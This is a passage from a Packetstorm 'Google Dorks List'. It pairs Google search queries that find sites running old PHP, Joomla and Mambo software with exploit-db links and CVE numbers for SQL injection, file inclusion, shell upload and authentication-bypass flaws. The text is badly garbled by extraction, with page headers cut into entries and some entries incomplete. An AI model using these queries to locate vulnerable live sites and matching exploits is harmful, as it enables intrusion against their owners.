miniBB 2.1 (table) Remote SQLInjection Vulnerability - CVE: 2007-5719: http://www.exploit-db.com/exploits/4587

"PHPNewsVersion 0.93" "PHPNews Version 0.93"

PHPNews 0.93 (format_menue)Remote File Inclusion Vulnerability -CVE: 2007-4232: http://www.exploit-db.com/exploits/4268

"/nuke/iframe.php" "/nuke/iframe.php"

iFrame for Phpnuke (iframe.php)Remote File Inclusion Vulnerability -CVE: 2007-1626: http://www.exploit-db.com/exploits/3512

Sad Raven's ClickCounter v1.0 Sad Raven's Click Counter v1.0

Sad Raven's Click Counter 1.0passwd.dat Disclosure:http://www.exploit-db.com/exploits/7844

Powered by dBMasters' CuriumCMS 1

Powered by dB Masters' CuriumCMS 1

dB Masters Curium CMS 1.03 (c_id)Remote SQL Injection Vulnerability -CVE: 2007-0765: http://www.exploit-db.com/exploits/3256

Powered by XT-Commerce Powered by XT-Commerce

XT-Commerce v1 Beta 1 by Pass /Creat and Download BackupVulnerability: http://www.exploit-db.com/exploits/12447

intext:"Poweredby RamaasSoftware"

intext:"Powered by RamaasSoftware"

Ramaas Software CMS SQL InjectionVulnerability: http://www.exploit-db.com/exploits/12412

Powered by MaianGreetings v2.1 Powered by Maian Greetings v2.1

Maian Greetings v2.1 Shell UploadVulnerability: http://www.exploit-db.com/exploits/11301

"Yogurt build" "Yogurt build"

Yogurt 0.3 (XSS/SQL Injection)Multiple Remote Vulnerabilities -CVE: 2009-2033: http://www.exploit-db.com/exploits/8932

inurl:e107_plugins inurl:e107_plugins e107 Code Exec - CVE: 2010-2099:http://www.exploit-

Page 363: Packetstorm Google Dorks List

db.com/exploits/12715

"Scientific ImageDataBase" "Scientific Image DataBase"

Scientific Image DataBase 0.41 BlindSQL Injection - CVE: 2008-2834:http://www.exploit-db.com/exploits/5885

Powered byphpMyRealty Powered by phpMyRealty

phpMyRealty 1.0.x (search.php type)Remote SQL Injection Vulnerability -CVE: 2007-6472: http://www.exploit-db.com/exploits/4750

"Powered bymyUPB" "Powered by myUPB"

myUPB v2.2.6 MultipleVulnerabilities: http://www.exploit-db.com/exploits/13957

inurl:"com_simpledownload" inurl:"com_simpledownload"

Joomla Component simpledownloadLFI Vulnerability - CVE: 2010-2122:http://www.exploit-db.com/exploits/12618

Powered by Flinx Powered by Flinx

flinx 1.3 (category.php id) RemoteSQL Injection Vulnerabilit - CVE:2008-0468: http://www.exploit-db.com/exploits/4985

allinurl:"com_restaurante" allinurl:"com_restaurante"

Joomla Component Restaurante 1.0(id) SQL Injection Vulnerability -CVE: 2008-1465: http://www.exploit-db.com/exploits/5280

Powered byMyHobbySite 1.01 Powered by MyHobbySite 1.01

MyHobbySite 1.01 SQL Injection andAuthentication Bypass Vulnerability:http://www.exploit-db.com/exploits/14977

inurl:index.php?myPlantId= inurl:index.php?myPlantId=

Member ID The Fish Index PHP SQLInjection Vulnerability:http://www.exploit-db.com/exploits/12850

"powered by real-estate-website" "powered by real-estate-website"

Real Estate Web Site 1.0 (SQL/XSS)Multiple Remote Vulnerabilities:http://www.exploit-db.com/exploits/5763

"Powered by [iSupport 1.8 ]" "Powered by [ iSupport 1.8 ]"

iSupport 1.8 XSS/LFI - CVE: 2009-4434: http://www.exploit-db.com/exploits/10478

"This site ispowered by CMSMade Simple

"This site is powered by CMS MadeSimple version 1.2.2"

CMS Made Simple 1.2.2 (TinyMCEmodule) SQL Injection Vuln - CVE:2007-6656: http://www.exploit-

Page 364: Packetstorm Google Dorks List

version 1.2.2" db.com/exploits/4810

infusions/manuals/manuals.php?manual=

infusions/manuals/manuals.php?manual=

PHP-Fusion Mod manuals (manual)Remote SQL Injection Vulnerability:http://www.exploit-db.com/exploits/6681

allinurl:/modernbill/ allinurl:/modernbill/

Modernbill 1.6 (config.php) RemoteFile Include Vulnerability - CVE:2006-4034: http://www.exploit-db.com/exploits/2127

Powered byEasySiteNetwork Powered by EasySiteNetwork

Wallpaper Site 1.0.09 (category.php)Remote SQL Injection Vulnerability -CVE: 2007-6580: http://www.exploit-db.com/exploits/4770

inurl:"main_forum.php?cat=" inurl:"main_forum.php?cat="

GeN3 forum V1.3 SQL InjectionVulnerability - CVE: 2009-4263:http://www.exploit-db.com/exploits/10299

intitle:"Poweredby Open BulletinBoard"

intitle:"Powered by Open BulletinBoard"

Open Bulletin Board Multiple BlindSql Injection Vulnerability:http://www.exploit-db.com/exploits/11336

Powered byFantastic Newsv2.1.4

Powered by Fantastic News v2.1.4

Fantastic News 2.1.4 Multiple RemoteFile Include Vulnerabilities:http://www.exploit-db.com/exploits/3027

"Powered byiScriptsSocialWare"

"Powered by iScripts SocialWare"

iScripts SocialWare (id) Remote SQLInjection Vulnerbility - CVE: 2008-1772: http://www.exploit-db.com/exploits/5402

Powered ByeLitius 1.0 Powered By eLitius 1.0

eLitius 1.0 Arbitrary Database Backup:http://www.exploit-db.com/exploits/8498

inurl:"com_artlinks" inurl:"com_artlinks"

Joomla Artlinks Component 1.0b4Remote Include Vulnerability - CVE:2006-3949: http://www.exploit-db.com/exploits/2209

inurl:com_djclassifieds inurl:com_djclassifieds

Joomla DJ-Classifieds Extensioncom_djclassifieds UploadVulnerability: http://www.exploit-db.com/exploits/12479

intext:"Remository3.25. is technology

intext:"Remository 3.25. istechnology by Black Sheep

Mambo Remository Component 3.25Remote Include Vulnerability - CVE:

Page 365: Packetstorm Google Dorks List

by Black SheepResearch"

Research" 2006-4130: http://www.exploit-db.com/exploits/2172

inurl:ratelink.php?lnkid= inurl:ratelink.php?lnkid=

Link Trader (ratelink.php lnkid)Remote SQL Injection Vulnerability -CVE: 2008-6102: http://www.exploit-db.com/exploits/6650

Powered by:deonixscripts.com Powered by: deonixscripts.com

Web Template Management System1.3 Remote SQL Injection - CVE:2007-5233: http://www.exploit-db.com/exploits/4482

inurl:com_ybggal inurl:com_ybggal

Joomla Component com_ybggal 1.0(catid) SQL Injection Vulnerability:http://www.exploit-db.com/exploits/13979

Powered ByPower Editor Powered By Power Editor

Power Editor 2.0 Remote FileDisclosure / Edit Vulnerability - CVE:2008-2116: http://www.exploit-db.com/exploits/5549

"Powered by:eSmile" "Powered by: eSmile"

eSmile Script (index.php) SQLInjection Vulnerability - CVE: 2010-0764: http://www.exploit-db.com/exploits/11382

"advanced_search_results.php?gender="

"advanced_search_results.php?gender="

Vastal I-Tech Dating Zone (fage) SQLInjection Vulnerability - CVE: 2008-4461: http://www.exploit-db.com/exploits/6388

allinurl:"com_ahsshop"do=default allinurl:"com_ahsshop"do=default

Mambo Component ahsShop 1.51(vara) SQL Injection Vulnerability:http://www.exploit-db.com/exploits/5335

inurl:com_ice"catid" inurl:com_ice "catid"

Joomla Component Ice Gallery 0.5b2(catid) Blind SQL Injection Vuln -CVE: 2008-6852: http://www.exploit-db.com/exploits/7572

Powered byExoPHPDesk v1.2Final.

Powered by ExoPHPDesk v1.2Final.

ExoPHPDesk 1.2.1 (faq.php) RemoteSQL Injection Vulnerability - CVE:2007-0676: http://www.exploit-db.com/exploits/3234

allinurl:spaw2/dialogs/ allinurl:spaw2/dialogs/

Spaw Editor v1.0 & 2.0 Remote FileUpload: http://www.exploit-db.com/exploits/12672

Powered by Powered by eLitius Version 1.0 eLitius 1.0 (banner-details.php id) SQL

Page 366: Packetstorm Google Dorks List

eLitius Version 1.0 Injection Vulnerability - CVE: 2009-1506: http://www.exploit-db.com/exploits/8563

site:scartserver.com site:scartserver.com

SCart 2.0 (page) Remote CodeExecution - CVE: 2006-7012:http://www.exploit-db.com/exploits/1876

"realizacjaeCreo.eu" "realizacja eCreo.eu"

eCreo SQL Injection Vulnerability:http://www.exploit-db.com/exploits/12713

inurl:index.php?title=gamepage inurl:index.php?title=gamepage

PHP Gamepage SQL InjectionVulnerability: http://www.exploit-db.com/exploits/12634

inurl:index.php?option=com_akobook

inurl:index.php?option=com_akobook

Joomla Component Akobook 2.3(gbid) SQL Injection Vulnerability -CVE: 2009-2638: http://www.exploit-db.com/exploits/8911

inurl:"/CMS/page.php?p=" inurl:"/CMS/page.php?p="

Schweizer NISADA CommunicationCMS SQL Injection Vulnerability:http://www.exploit-db.com/exploits/10543

Powered byCMScout (c)2005CMScout Group

Powered by CMScout (c)2005CMScout Group

CMScout 2.06 SQL Injection/LocalFile Inclusion Vulnerabilities - CVE:2008-6725: http://www.exploit-db.com/exploits/7625

Powered by:Maian Uploaderv4.0

Powered by: Maian Uploader v4.0Maian Uploader v4.0 Shell UploadVulnerability: http://www.exploit-db.com/exploits/11571

inurl:"com_virtuemart" inurl:"com_virtuemart"

Joomla Component com_virtuemartSQL injection vulnerability(product_id): http://www.exploit-db.com/exploits/10407

"Powered byRW::Downloadv2.0.3 lite"

"Powered by RW::Download v2.0.3lite"

RW::Download 2.0.3 lite (index.phpdlid) Remote SQL Injection Vuln -CVE: 2007-4845: http://www.exploit-db.com/exploits/4371

index.php?option=com_swmenupro index.php?option=com_swmenupro

Joomla/Mambo ComponentSWmenuFree 4.0 RFI Vulnerability -CVE: 2007-1699: http://www.exploit-db.com/exploits/3557

"Powered ByOpenCart" "Powered By OpenCart" Opencart 1.4.9.1 Remote File Upload

Vulnerability: http://www.exploit-

Page 367: Packetstorm Google Dorks List

db.com/exploits/15050

Powered byeclime.com Powered by eclime.com

eclime v1.1 ByPass / Create andDownload Backup Vulnerability:http://www.exploit-db.com/exploits/12279

inurl:"article.download.php" inurl:"article.download.php"

Star Articles 6.0 Remote Blind SQLInjection Vulnerability - CVE: 2008-7075: http://www.exploit-db.com/exploits/7240

inurl:"com_mojo" inurl:"com_mojo"

Joomla MojoBlog Component v0.15Multiple Remote File IncludeVulnerabilities - CVE: 2009-4789:http://www.exploit-db.com/exploits/10273

inurl:"article.download.php" inurl:"article.download.php"

Star Articles 6.0 Remote Blind SQLInjection - CVE: 2008-7075:http://www.exploit-db.com/exploits/7243

"Powered byLightBlog" -Powered byLightBlog

"Powered by LightBlog" - Poweredby LightBlog

LightBlog 9.5 cp_upload_image.phpRemote File Upload Vulnerability -CVE: 2008-0632: http://www.exploit-db.com/exploits/5033

"Powered byphotokorn" "Powered by photokorn"

photokron 1.7 (update script) RemoteDatabase Disclosure - CVE: 2008-0297: http://www.exploit-db.com/exploits/4897/

"Site designed andbuilt by PowderBlue."inurl:index.php?id_page=

"Site designed and built by PowderBlue." inurl:index.php?id_page=

Powder Blue Design SQL InjectionVulnerability: http://www.exploit-db.com/exploits/12671

"Powered byMetInfo 3.0" "Powered by MetInfo 3.0"

MetInfo 3.0 PHP Code InjectionVulnerability: http://www.exploit-db.com/exploits/15361

"Powered byMetInfo 2.0" "Powered by MetInfo 2.0"

MetInfo 2.0 PHP Code InjectionVulnerability: http://www.exploit-db.com/exploits/15360

intext:"MarketingWeb Design -Posicionamientoen Buscadores"

intext:"Marketing Web Design -Posicionamiento en Buscadores"

Marketing Web Design MultipleVulnerabilities: http://www.exploit-db.com/exploits/12788

pages.php?id= pages.php?id= "Multi Vendor Mall" Multi Vendor Mall (pages.php) SQL

Page 368: Packetstorm Google Dorks List

"Multi VendorMall"

Injection Vulnerability:http://www.exploit-db.com/exploits/12748

allintext:"HomeMember SearchChat Room ForumHelp/Supportprivacy policy"

allintext:"Home Member SearchChat Room Forum Help/Supportprivacy policy"

eMeeting Online Dating Software 5.2SQL Injection Vulnerabilities: CVE:2007-3609: http://www.exploit-db.com/exploits/4154

Powered byZylone IT Powered by Zylone IT

Zylone IT Multiple Blind SQLInjection Vulnerability:http://www.exploit-db.com/exploits/14270

Powered byMetInfo 3.0 Powered by MetInfo 3.0

Metinfo v3.0 Multiple Vulnerabilities:http://www.exploit-db.com/exploits/15496

Powered by InfoFisier. Powered by Info Fisier.

Info Fisier 1.0 Remote File UploadVulnerability: http://www.exploit-db.com/exploits/10671

"Powered byWebText" "Powered by WebText"

WebText 0.4.5.2 Remote CodeExecution - CVE: 2006-6856:http://www.exploit-db.com/exploits/3036

WebdevelopmentTinx-IT Webdevelopment Tinx-IT

WebVision 2.1 (news.php n) RemoteSQL Injection: http://www.exploit-db.com/exploits/9193

"PHPGlossarVersion 0.8" "PHPGlossar Version 0.8"

PHPGlossar 0.8 (format_menue)Remote File Inclusion Vulnerabilities -CVE: 2007-2751: http://www.exploit-db.com/exploits/3941

com_ijoomla_rss com_ijoomla_rss

Joomla Component com_ijoomla_rssBlind SQL Injection - CVE: 2009-2099: http://www.exploit-db.com/exploits/8959

inurl:"?pilih=forum" inurl:"?pilih=forum"

AuraCMS [Forum Module] RemoteSQL Injection Vulnerability - CVE:2007-4171: http://www.exploit-db.com/exploits/4254

"Developed byInfowareSolutions"

"Developed by Infoware Solutions"infoware SQL Injection Vulnerability:http://www.exploit-db.com/exploits/12714

"Powered by:MyPHP Forum" "Powered by: MyPHP Forum" MyPHP Forum

Page 369: Packetstorm Google Dorks List

Ayemsis EmlakPro Ayemsis Emlak Pro

Ayemsis Emlak Pro (acc.mdb)Database Disclosure Vulnerability:http://www.exploit-db.com/exploits/7665

Powered byGuruscript.com Powered by Guruscript.com

Freelancer Marketplace Script UploadVulnerability: http://www.exploit-db.com/exploits/14390

allinurl:"index.php?mod=archives" allinurl:"index.php?mod=archives"

KwsPHP Module Archives (id)Remote SQL Injection Vulnerability:http://www.exploit-db.com/exploits/5351

"index.php?option=com_qcontacts" "index.php?option=com_qcontacts"

Joomla Component QContacts(com_qcontacts) SQL InjectionVulnerability: http://www.exploit-db.com/exploits/14350

"Powered ByCrownWeb.net!"inurl:"page.cfm"

"Powered By CrownWeb.net!"inurl:"page.cfm"

crownweb (page.cfm) Sql InjectionVulnerability: http://www.exploit-db.com/exploits/11299

Copyright @ 2007Powered By Hotor Not Clone byJnshosts.com RateMy Pic :: Home ::Advertise ::Contact us::

Copyright @ 2007 Powered By Hotor Not Clone by Jnshosts.com RateMy Pic :: Home :: Advertise ::Contact us::

Hot or Not Clone by Jnshosts.comDatabase Backup Dump Vulnerability -CVE: 2007-6603: http://www.exploit-db.com/exploits/4804

Powered byTextAds 2.08 Powered by TextAds 2.08

idevspot Text ads 2.08 sqlivulnerability - CVE: 2010-2319:http://www.exploit-db.com/exploits/13749

inurl:/com_chronocontact inurl:/com_chronocontact

Joomla Component ChronoForms 2.3.5RFI Vulnerabilities - CVE: 2008-0567:http://www.exploit-db.com/exploits/5020

inurl:"com_kochsuite" inurl:"com_kochsuite"

Joomla Kochsuite Component 0.9.4Remote File Include Vulnerability -CVE: 2006-4348: http://www.exploit-db.com/exploits/2215

inurl:"contentPage.php?id=" &inurl:"displayResource.php?id=" & ...

inurl:"contentPage.php?id=" ORinurl:"displayResource.php?id="AND intext:"Website by Mile HighCreative"

MileHigh Creative (SQL/XSS/HTMLInjection) Multiple Vulnerabilities:http://www.exploit-db.com/exploits/12792

Come from homeScript ( Latest

Come from home Script ( LatestProject ) www.esmart-vision.com

Smart Vsion Script News (newsdetail)SQL Injection Vulnerability:

Page 370: Packetstorm Google Dorks List

Project )www.esmart-vision.com

http://www.exploit-db.com/exploits/10977

inurl:com_jepoll inurl:com_jepoll

Joomla Component com_jepoll (pollid)SQL Injection Vulnerability:http://www.exploit-db.com/exploits/12781

inurl:option=articles artid inurl:option=articles artid

Mambo Component Articles (artid)Blind SQL Injection:http://www.exploit-db.com/exploits/5935

inurl:"com_jembed" inurl:"com_jembed"

com_jembed (catid) Blind SQLInjection - CVE: 2010-1073:http://www.exploit-db.com/exploits/11026

"powered byGradman" "powered by Gradman"

Gradman 0.1.3 (agregar_info.php)Local File Inclusion - CVE: 2008-0361: http://www.exploit-db.com/exploits/4926

inurl:com_bfsurvey_profree inurl:com_bfsurvey_profree

Joomla Component BF Survey ProFree SQL Injection - CVE: 2009-4625:http://www.exploit-db.com/exploits/9601

inurl:option=com_cinema inurl:option=com_cinema

Joomla component cinema SQLinjection Vulnerability:http://www.exploit-db.com/exploits/13792

inurl:com_jejob inurl:com_jejobJoomla JE Job Component com_jejobLFI Vulnerability: http://www.exploit-db.com/exploits/14063

inurl:prog.php?dwkodu= inurl:prog.php?dwkodu=

Kolifa.net Download Script 1.2 (id)SQL Injection Vulnerability - CVE:2008-4054: http://www.exploit-db.com/exploits/6310

"Designed andpowered by AWSSports"

"Designed and powered by AWSSports"

Sports Accelerator Suite v2.0(news_id) Remote SQL InjectionVulnerability: http://www.exploit-db.com/exploits/14645

"powered byzomplog" "powered by zomplog" Zomplog

"Powered byWebStudio"

Joomla Component com_eportfolioUpload Vulnerability

WebStudio CMS (index.php pageid)Blind SQL Injection Vulnerability -

Page 371: Packetstorm Google Dorks List

CVE: 2008-5336: http://www.exploit-db.com/exploits/7216

inurl:com_eportfolio inurl:com_eportfolio

Joomla Component com_eportfolioUpload Vulnerability:http://www.exploit-db.com/exploits/13951

intext:"ParlicDesign" inurl:id intext:"Parlic Design" inurl:id

parlic Design (SQL/XSS/HTML)Multiple Vulnerabilities:http://www.exploit-db.com/exploits/12767

[ Powered bySkaDate dating ] [ Powered by SkaDate dating ]

SkaDate Dating (RFI/LFI/XSS)Multiple Remote Vulnerabilities -CVE: 2009-4700: http://www.exploit-db.com/exploits/9260

inurl:com_jotloader inurl:com_jotloader

Joomla Component jotloader 1.2.1.aBlind SQL injection - CVE: 2008-2564: http://www.exploit-db.com/exploits/5737

"Site designed andbuilt Powered byGlobalWebTek."

"Site designed and built Powered byGlobalWebTek."

GlobalWebTek Design SQL InjectionVulnerability: http://www.exploit-db.com/exploits/12761

inurl:/wp-content/plugins/fgallery/

inurl:/wp-content/plugins/fgallery/

Wordpress plugin fGallery 2.4.1fimrss.php SQL Injection Vulnerability- CVE: 2008-0491: http://www.exploit-db.com/exploits/4993

Powered byGuruscript.com Powered by Guruscript.com

Freelancers Marketplace ScriptPersistent XSS Vulnerability:http://www.exploit-db.com/exploits/14389

"powered byjshop" "powered by jshop"

JShop 1.x - 2.x (page.php xPage) LocalFile Inclusion Vulnerability - CVE:2008-1624: http://www.exploit-db.com/exploits/5325

"Powered by TSSpecial Edition" "Powered by TS Special Edition"

TS Special Edition v.7.0 MultipleVulnerabilities: http://www.exploit-db.com/exploits/12645

inurl:/jobsearchengine/ inurl:/jobsearchengine/

i-netsolution Job Search Engine SQLInjection Vulnerability - CVE: 2010-2611: http://www.exploit-db.com/exploits/14079

inurl:"com_jgen" inurl:"com_jgen" Joomla Component (com_jgen) SQLInjection Vulnerability - CVE: 2010-

Page 372: Packetstorm Google Dorks List

3422: http://www.exploit-db.com/exploits/14998

inurl:inc_webblogmanager.asp inurl:inc_webblogmanager.asp DMXReady Blog Manager

Powered byeLitius Version 1.0 Powered by eLitius Version 1.0

eLitius 1.0 (manage-admin.php) AddAdmin/Change Password:http://www.exploit-db.com/exploits/8459

inurl:com_n-forms inurl:com_n-formsJoomla Component n-forms 1.01 BlindSQL Injection: http://www.exploit-db.com/exploits/6055

inurl:index.php?option=com_races"raceId"

inurl:index.php?option=com_races"raceId"

Joomla Component com_races BlindSQL Injection Vulnerability:http://www.exploit-db.com/exploits/11710

"powered bygelato cms" "powered by gelato cms"

Gelato (index.php post) Remote SQLInjectio - CVE: 2007-4918:http://www.exploit-db.com/exploits/4410

inurl:"cont_form.php?cf_id=" inurl:"cont_form.php?cf_id="

WebDM CMS SQL InjectionVulnerability - CVE: 2010-2689:http://www.exploit-db.com/exploits/14123

allinurl:links.php?t=search allinurl:links.php?t=search

phpBB Links MOD 1.2.2 Remote SQLInjection - CVE: 2007-4653:http://www.exploit-db.com/exploits/4346

inurl:"com_dateconverter" inurl:"com_dateconverter"

Joomla Component com_dateconverter0.1 SQL Injection Vulnerability:http://www.exploit-db.com/exploits/14154

inurl:"com_simplefaq" inurl:"com_simplefaq"

Joomla Component com_simplefaq(catid) Blind Sql InjectionVulnerability - CVE: 2010-0632CVE:2010-0632: http://www.exploit-db.com/exploits/11294

inurl:com_jb2 inurl:com_jb2

Joomla Component JooBlog 0.1.1Blind SQL Injection - CVE: 2008-2630: http://www.exploit-db.com/exploits/5734

inurl:"com_dms" inurl:"com_dms" Joomla Component com_dms SQLInjection Vulnerability - CVE: 2010-

Page 373: Packetstorm Google Dorks List

0800: http://www.exploit-db.com/exploits/11289

"powered by:profitCode" "powered by: profitCode"

PayProCart 1146078425 MultipleRemote File Include Vulnerabilities -CVE: 2006-4672: http://www.exploit-db.com/exploits/2316

inurl:/phpplanner/userinfo.php?userid=

inurl:/phpplanner/userinfo.php?userid=

phpplanner XSS / SQL Vulnerability:http://www.exploit-db.com/exploits/13847

"/nuke/htmltonuke.php" -"htmltonuke.php"

"/nuke/htmltonuke.php" -"htmltonuke.php"

PHP-Nuke Module htmltonuke2.0alpha (htmltonuke.php) RFI Vuln:http://www.exploit-db.com/exploits/3524

Powered by UGiAPHP UPLOADERV0.2

Powered by UGiA PHPUPLOADER V0.2

UGiA PHP UPLOADER V0.2 ShellUpload Vulnerability:http://www.exploit-db.com/exploits/11261

Powered byiBoutique v4.0 Powered by iBoutique v4.0

iBoutique 4.0 (cat) Remote SQLInjection Vulnerability - CVE: 2008-4354: http://www.exploit-db.com/exploits/6444

"Powered byClanAdmin Toolsv1.4.2"

"Powered by ClanAdmin Toolsv1.4.2"

ClanWeb 1.4.2 Remote ChangePassword / Add Admin:http://www.exploit-db.com/exploits/8717

"index.php?option=com_expose" "index.php?option=com_expose"

Joomla Component Expose RC35Remote File Upload Vulnerability -CVE: 2007-3932: http://www.exploit-db.com/exploits/4194

inurl:yvcomment inurl:yvcomment

Joomla Component yvcomment 1.16Blind SQL Injection - CVE: 2008-2692: http://www.exploit-db.com/exploits/5755

Powered byosCommerce |Customized byEZ-Oscommerce

Powered by osCommerce |Customized by EZ-Oscommerce

EZ-Oscommerce 3.1 Remote FileUpload: http://www.exploit-db.com/exploits/14415

"kims Q -AdministratorLogin Mode"

"kims Q - Administrator LoginMode"

KimsQ 040109 Multiple Remote FileInclude Vulnerability:http://www.exploit-db.com/exploits/11960

inurl:"coursepage. inurl:"coursepage.php?id=" Aim Web Design Multiple

Page 374: Packetstorm Google Dorks List

php?id="intext:"Web Sitedesign by : AimWeb DesignCheshire"

intext:"Web Site design by : AimWeb Design Cheshire"

Vulnerabilities: http://www.exploit-db.com/exploits/12791

Powered by One-News Powered by One-News

OneNews Beta 2 (XSS/HI/SQL)Multiple Remote Vulnerabilities:http://www.exploit-db.com/exploits/6292

"Powered by PHPDirector" "Powered by PHP Director" PHPDirector

"WebdesignCosmos Solutions" "Webdesign Cosmos Solutions"

Cosmos Solutions cms SQL InjectionVulnerability: http://www.exploit-db.com/exploits/12793

inurl:"com_hestar" inurl:"com_hestar"

Mambo Component com_hestarRemote SQL Injection Vulnerability:http://www.exploit-db.com/exploits/9609

"Powered byNovaBoardv1.0.0"

"Powered by NovaBoard v1.0.0"NovaBoard 1.0.0 Multiple RemoteVulnerabilities: http://www.exploit-db.com/exploits/8063

inurl:es_offer.php?files_dir= inurl:es_offer.php?files_dir=

Weblogicnet (files_dir) MultipleRemote File Inclusion Vulnerabilities -CVE: 2007-4715: http://www.exploit-db.com/exploits/4352

inurl:index.php?option=com_joomlaconnect_be

inurl:index.php?option=com_joomlaconnect_be

Joomla Componentcom_joomlaconnect_be Blind InjectionVulnerability: http://www.exploit-db.com/exploits/11578

"Powered byTinyPHPForumv3.61"

"Powered by TinyPHPForumv3.61"

TinyPHPForum 3.61 File Disclosure /Code Execution Vulnerabilities:http://www.exploit-db.com/exploits/8342

intitle:"CCMSv3.1 Demo PW" intitle:"CCMS v3.1 Demo PW"

CCMS 3.1 Demo Remote SQLInjection - CVE: 2007-6658:http://www.exploit-db.com/exploits/4809

"powered bymcGalleryPRO" "powered by mcGalleryPRO"

mcGalleryPRO 2006 (path_to_folder)Remote Include Vulnerability - CVE:2006-4720: http://www.exploit-db.com/exploits/2342

Powered by Powered by Dayfox Designs This is Dayfox Blog 4 Multiple Local File

Page 375: Packetstorm Google Dorks List

Dayfox DesignsThis is a port ofWordPress

a port of WordPress Inclusion Vulnerabilities - CVE: 2008-3564: http://www.exploit-db.com/exploits/6203

"Powered ByEgyPlus" "Powered By EgyPlus"

EgyPlus 7ml 1.0.1 (Auth Bypass) SQLInjection Vulnerability - CVE: 2009-2167: http://www.exploit-db.com/exploits/8865

inurl:com_seminar inurl:com_seminar

Joomla Component Seminar 1.28 (id)Blind SQL Injection - CVE: 2009-4200: http://www.exploit-db.com/exploits/8867

allintext:"PoweredBy Buddy Zone" allintext:"Powered By Buddy Zone"

Buddy Zone 1.5 Multiple SQLInjection Vulnerabilities - CVE: 2007-3526: http://www.exploit-db.com/exploits/4128

inurl:index.php?option=com_ice inurl:index.php?option=com_ice

Joomla Component com_ice BlindSQL Injection Vulnerability:http://www.exploit-db.com/exploits/11544

Powered byLiteCommerce Powered by LiteCommerce

litecommerce 2004 (category_id)Remote SQL Injection Vulnerability -CVE: 2005-1032: http://www.exploit-db.com/exploits/4300

"Web GroupCommunicationCenter"

"Web Group CommunicationCenter"

Web Group Communication Center(WGCC) 1.0.3 SQL Injection Vuln -CVE: 2008-2445: http://www.exploit-db.com/exploits/5606

inurl:com_xewebtv inurl:com_xewebtv

Joomla Component Xe webtv (id)Blind SQL Injection - CVE: 2008-5200: http://www.exploit-db.com/exploits/5966

inurl:index.php?option=com_paxgallery

inurl:index.php?option=com_paxgallery

Joomla Component com_paxgalleryBlind Injection Vulnerability:http://www.exploit-db.com/exploits/11595

"Site designed andbuilt by ProWebAssociates."

"Site designed and built by ProWebAssociates."

ProWeb Design SQL InjectionVulnerability: http://www.exploit-db.com/exploits/12730

Powered byiScriptsSocialWare

Powered by iScripts SocialWareUpload Vulnerability and XSS insocialware V2.2: http://www.exploit-db.com/exploits/12448

"(C) This site is "(C) This site is NITROpowered!" NITRO Web Gallery SQL Injection

Page 376: Packetstorm Google Dorks List

NITROpowered!" Vulnerability - CVE: 2010-2141:http://www.exploit-db.com/exploits/12735

"phpQuestionnairev3" "phpQuestionnaire v3"

phpQuestionnaire 3.12 (phpQRootDir)Remote File Include Vulnerability -CVE: 2006-4966: http://www.exploit-db.com/exploits/2410

"generated byExhibit Engine 1.5RC 4"

"generated by Exhibit Engine 1.5RC 4"

Exhibit Engine 1.5 RC 4(photo_comment.php) File Include -CVE: 2006-5292: http://www.exploit-db.com/exploits/2509

powered byconnectix boards powered by connectix boards

Connectix Boards 0.8.2 template_pathRemote File Inclusion - CVE: 2008-0502: http://www.exploit-db.com/exploits/5012

inurl:com_ezstore inurl:com_ezstore

Joomla Component EZ Store RemoteBlind SQL Injection - CVE: 2008-3586: http://www.exploit-db.com/exploits/6199

"FrontAccounting" "FrontAccounting"

FrontAccounting 1.13 Remote FileInclusion Vulnerabilities - CVE: 2007-5117: http://www.exploit-db.com/exploits/4456

inurl:"option=com_elite_experts" inurl:"option=com_elite_experts"

Joomla Component(com_elite_experts) SQL InjectionVulnerability: http://www.exploit-db.com/exploits/15100

inurl:"com_tupinambis" inurl:"com_tupinambis"

Joomla/Mambo Tupinambis SQLInjection - CVE: 2009-3434:http://www.exploit-db.com/exploits/9832

"Powered ByBasic CMSSweetRice"

"Powered By Basic CMSSweetRice"

SweetRice 0.6.4 (fckeditor) RemoteFile Upload: http://www.exploit-db.com/exploits/14184

"Powered byAMCMS3" "Powered by AMCMS3"

Arcadem 2.01 Remote SQL Injection /RFI Vulnerabilties: http://www.exploit-db.com/exploits/4326

"Web Site Designby Red CatStudios"

"Web Site Design by Red CatStudios"

Realtor WebSite System E-CommerceSQL Injection Vulnerability:http://www.exploit-db.com/exploits/12772

inurl:index.php?op inurl:index.php?option=com_livetic Joomla Component com_liveticker

Page 377: Packetstorm Google Dorks List

tion=com_liveticker "viewticker"

ker "viewticker" Blind SQL Injection Vulnerability:http://www.exploit-db.com/exploits/11604

allinurl:"com_cinema" allinurl:"com_cinema"

Joomla Component Cinema 1.0Remote SQL Injection Vulnerability:http://www.exploit-db.com/exploits/5300

"Tanyakan PadaRumput YangBergoyang"

"Tanyakan Pada Rumput YangBergoyang"

Autonomous LAN party 0.98.3 RemoteFile Inclusion Vulnerability:http://www.exploit-db.com/exploits/9460

"Powered byClipshare" "Powered by Clipshare"

ClipShare 2.6 Remote User PasswordChange - CVE: 2008-7188:http://www.exploit-db.com/exploits/4837

"Powered byPHPizabi v0.848bC1 HFP1"

"Powered by PHPizabi v0.848b C1HFP1"

PHPizabi 0.848b C1 HFP1 RemoteFile Upload Vulnerability - CVE:2008-0805: http://www.exploit-db.com/exploits/5136

inurl:com_jejob inurl:com_jejob

Joomla Component com_jejob 1.0(catid) SQL Injection Vulnerability:http://www.exploit-db.com/exploits/12782

"Devana is anopen sourceproject !"

"Devana is an open source project!"

Devana SQL Injection vulnerability -CVE: 2010-2673: http://www.exploit-db.com/exploits/11922

inurl:"com_jpodium" inurl:"com_jpodium"

Joomla JPodium Component(com_jpodium) SQL InjectionVulnerability: http://www.exploit-db.com/exploits/14232

intext:"Poweredby: Virtual Warv1.5.0"

intext:"Powered by: Virtual Warv1.5.0"

VWar 1.50 R14 (online.php) RemoteSQL Injection Vulnerability - CVE:2006-4142: http://www.exploit-db.com/exploits/2170

inurl:index.php/option?com_flexicontent

inurl:index.php/option?com_flexicontent

Joomla Component com_flexicontentLocal File Vulnerability:http://www.exploit-db.com/exploits/12185

inurl:option=com_agenda inurl:option=com_agenda

Joomla Component com_agenda 1.0.1(id) SQL Injection Vulnerability -CVE: 2010-1716: http://www.exploit-db.com/exploits/12132

Page 378: Packetstorm Google Dorks List

inurl:"index.php?css=mid=art=" inurl:"index.php?css=mid=art="

EasyWay CMS (index.php mid)Remote SQL Injection - CVE: 2008-2555: http://www.exploit-db.com/exploits/5706

"Powered ByWebcards" "Powered By Webcards"

WebCards 1.3 Remote SQL InjectionVulnerability - CVE: 2008-4878:http://www.exploit-db.com/exploits/6869

